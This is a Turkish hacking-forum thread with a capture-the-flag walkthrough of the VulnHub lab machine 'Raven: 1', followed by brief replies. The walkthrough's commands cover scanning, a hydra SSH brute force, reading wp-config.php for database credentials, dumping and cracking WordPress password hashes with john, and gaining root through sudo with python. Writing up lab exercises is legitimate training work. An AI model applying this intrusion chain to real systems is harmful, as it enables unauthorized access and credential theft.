Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm


Raven: 1 Zafiyetli Makine Çözümü /qwx

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 02-12-2018 20:44   #1
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 407


Raven: 1 Zafiyetli Makine Çözümü /qwx



Raven: 1 Zafiyetli Makine Çözümü
Raven:1 İndime Linki;
Kod:
https://www.vulnhub.com/entry/raven-1,256/

Açılışta makinemizin görüntüsü şu şekildedir.




İlk olarak IP taraması ile makinemizin çözümüne başlıyoruz.
Kod:
netdiscover





Sıra açık olan portları listelemekte.
Kod:
nmap <adress>





Hemen bir siteye göz atıyoruz.




Sitemiz açıldı bir çok uzantısı olduğunu görmekteyiz.İçerisinde neler bulunduğunu görmek için deniyoruz.




Bu siteler dışında herhangi bir dosya olup olmadığını kontrol etmek amacıyla dirb taraması gerçekleştireceğiz.Bir çok sonuç elde ettik fakat göze batan kısım buralar oldu.
Kod:
dirb http://<adress>





dirb taramasından aldığımız sonuç ile <adress>/wordpress/wp-admin/ 'e giriş sağlamayı deniyoruz bizi wp-login ekranı karşılıyor.




WordPress taraması uygulayacağız.Bu yöntem ile sitede açıklar tarayarak admin giriş bilgilerini bize listeleyecektir.steven ve michael bize çıkan sonuçlar arasında.İki seçenek içinde wp-login ekranında bilindik şifre kombinasyonlarını deneyince bir giriş sağlamadık.michael'in ağına bağlanmayı deniyoruz.
Kod:
wpscan --url http://<adress>/wordpress/ --wp-content-dir -ep -et -eu





Ardından SSH giriş için michael in şifresini brute force yöntemi ile bulacağız.
Not : rockyou.txt.gz default olarak sistemde bulunmaktadır dilerseniz başka bir wordlist.txt için dizin değiştirebilirsiniz.
Kod:
hydra -l michael -P /usr/share/wordlists/rockyou.txt.gz ssh://<adress>




ID ve Pass'ımız var artık SSH giriş yapabiliriz.
Not : Makineyi kapatıp tekrar açmam sonrası IP'si 192.168.1.4 olarak atanmıştır.


Kod:
ssh michael@<adress>michael



Evet karşımıza bir çok dosya çıkmaktadır ilk önce flag.txt'leri bulmak adına bir arama yapıyoruz.flag2.txt yi bulduk.
Kod:
find / -name "flag*.txt"

flag2'nin konumundan yola çıkarak wordpress'in dosyalarına da ulaşmış oluyoruz.
Kod:
cd /var
cd www
 cat flag2.txt
 cd html
 cd wordpress
 ls -ka



wp-config.php içini görüntüleyeceğiz şimdide.


Kod:
less wp-config.php
Çıkış için ise ; q 



ID ve Pass'ımızı aldık şimdide mysql veri tabanına giriş yapacağız ID : root Pass:
R@v3nSecurity Giriş yaptıktan sonra ilk olarak bizden databases seçmemiz isteniyor ardından kullanıcıların olduğu verileri listeliyoruz.



Kod:
mysql -u root -p
R@v3nSecurity
 show databases;
 use wordpress;
 show tables;
 select * from wp_users;



Evet karşımızda michael ve steven kullanıcı bilgileri çıkıyor ve karşıladınra şifreleri şifreleri md5 kırma sitesinde denediğimizde kırılmadığını farkettim onun için farklı bir yol deniyoruz.


Kod:
vim hash.txt
  $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
 $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
 :wq! john hash.txt
Ve şifremiz kırıldı.Şimdide elimizdeki ID ve Pass ile giriş sağlayacağız.




Sıra şimdi root yetkisi edinmekte.Ardından da flag bulmakta.


Kod:
su - steven
pink84
 /bin/bash -i
 sudo -l
 sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/sh")'


Ve başarılı bir şekilde makinemizin çözümüne ulaşmış olduk.



___________________________________________

A hacker does for love what others would not do for money.
 Offline  
 
Alıntı ile Cevapla
Alt 02-12-2018 20:46   #2
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2016
Nereden
Antalya
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 678
Teşekkür (Aldı): 1936




Eline sağlık başarılı bir çözüme benziyor, okuyacağım (yazmasam olmazdı bi etiket atmadığın kalmış ).
 Offline  
 
Alıntı ile Cevapla
Alt 02-12-2018 20:49   #3
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 407




Alıntı:
R4V3N´isimli üyeden Alıntı Mesajı göster
Eline sağlık başarılı bir çözüme benziyor, okuyacağım (yazmasam olmazdı bi etiket atmadığın kalmış ).

Sızma testini yaparken sen geldin hep aklıma 2.'side var Ravenin Teşekkür ederim



___________________________________________

A hacker does for love what others would not do for money.
 Offline  
 
Alıntı ile Cevapla
Alt 02-12-2018 21:57   #4
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2016
Nereden
Antalya
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 678
Teşekkür (Aldı): 1936




Alıntı:
Qwx´isimli üyeden Alıntı Mesajı göster
Sızma testini yaparken sen geldin hep aklıma 2.'side var Ravenin Teşekkür ederim
Çok CTF ile ilgim var ya (: bi @ch_arli41 olamayız..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

ch_arli41 Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau